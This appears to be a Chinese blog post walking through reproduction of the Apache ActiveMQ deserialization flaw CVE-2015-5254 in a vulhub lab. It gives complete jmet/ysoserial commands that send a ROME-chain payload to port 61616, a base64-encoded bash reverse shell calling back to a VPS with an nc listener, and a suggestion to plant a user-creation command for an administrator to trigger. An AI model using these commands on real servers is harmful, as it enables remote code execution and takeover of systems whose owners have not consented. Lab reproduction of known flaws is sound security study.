vulhub-activemq(CVE-2015-5254)

Apache ActiveMQ 5.13.0版本之前到5.x版本的安全漏洞,该程序引起的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象,利用该漏洞执行任意代码。

Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0

利用限制

1.版本符合
2.立即执行代码:能够通过弱密码登录查看消息队列
3.没有查看队列所有消息的用户名和密码下,只能管理员/用户去点击我们插入的消息才能触发(比较鸡肋,但可以写入创建用户命令等待管理员点击查看,概率很大!)

jdk版本8

17不能使用

192.168.62.131     #靶机

192.168.62.142     #攻击机

192.168.62.143     #vps

#进入vulhub漏洞环境目录

cd /opt/vulhub-master/activemq/CVE-2015-5254/

#启用漏洞环境

docker-compose up -d

访问对应端口

admin/admin

可以看到ActiveMQ版本是5.11.1,属于ActiveMQ 反序列化漏洞 (CVE-2015-5254)的影响版本范围。

复现

发现目标开放的61616端口上承载apachemq ActiveMQ服务。

#下载jmetjar

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

执行命令,将有效负载发送到目标IP61616端口。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.62.131 61616

【命令解释】:调用java -jar 运行 jmet的jar包,-Q是插入一个名为event的队列,-I 是选择装载ActiveMQ模块 ,-s 是选择ysoserial payload ,-Y 是攻击模式和内容, -Yp 是选择攻击利用链,这是选择是ROME, 之后带上IP加端口。

-Q 比如我修改event为hack 就成为插入一个名为hack的队列。

这时,会给目标ActiveMQ添加一个event列,我们可以通过http://192.200.30.72:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息

点击event触发

登录ActiveMQ容器环境,查看命令已经执行成功,/tmp/sucess文件已成功创建

反弹shell,反弹到vps

#bash反弹命令

bash -i >& /dev/tcp/192.168.62.143/31005 0>&1   #143是vps

#bash64解码

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMjAwLjMwLjE2Ni8zMTAwNSAwPiYx}|{base64,-d}|{bash,-i}

-c前面是空格

#vps上开启端口监听

nc -lvvp 31005

攻击机执行shell命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYyLjE0My8zMTAwNSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.62.131 61616

记住ID号

点击

查看vsp

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-10 09:58:04       4 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-10 09:58:04       5 阅读
  3. 在Django里面运行非项目文件

    2024-07-10 09:58:04       4 阅读
  4. Python语言-面向对象

    2024-07-10 09:58:04       4 阅读

热门阅读

  1. HTML(30)——动画

    2024-07-10 09:58:04       8 阅读
  2. 贪心算法-以高校教材管理系统为例

    2024-07-10 09:58:04       7 阅读
  3. 使用 .NET 实现 MongoDB

    2024-07-10 09:58:04       9 阅读
  4. ES5/ES6补充笔记

    2024-07-10 09:58:04       10 阅读
  5. Conda Channels全掌握:Linux中添加与移除的艺术

    2024-07-10 09:58:04       15 阅读
  6. Jetson-AGX-Orin离线安装nvidia-jetpack

    2024-07-10 09:58:04       8 阅读
  7. 2024前端面试真题【CSS篇】

    2024-07-10 09:58:04       9 阅读
  8. 如何使用echart画k线图

    2024-07-10 09:58:04       9 阅读
  9. 【国产开源可视化引擎】Meta2d.js简介

    2024-07-10 09:58:04       10 阅读
  10. 【C语言】常见的数据排序算法

    2024-07-10 09:58:04       9 阅读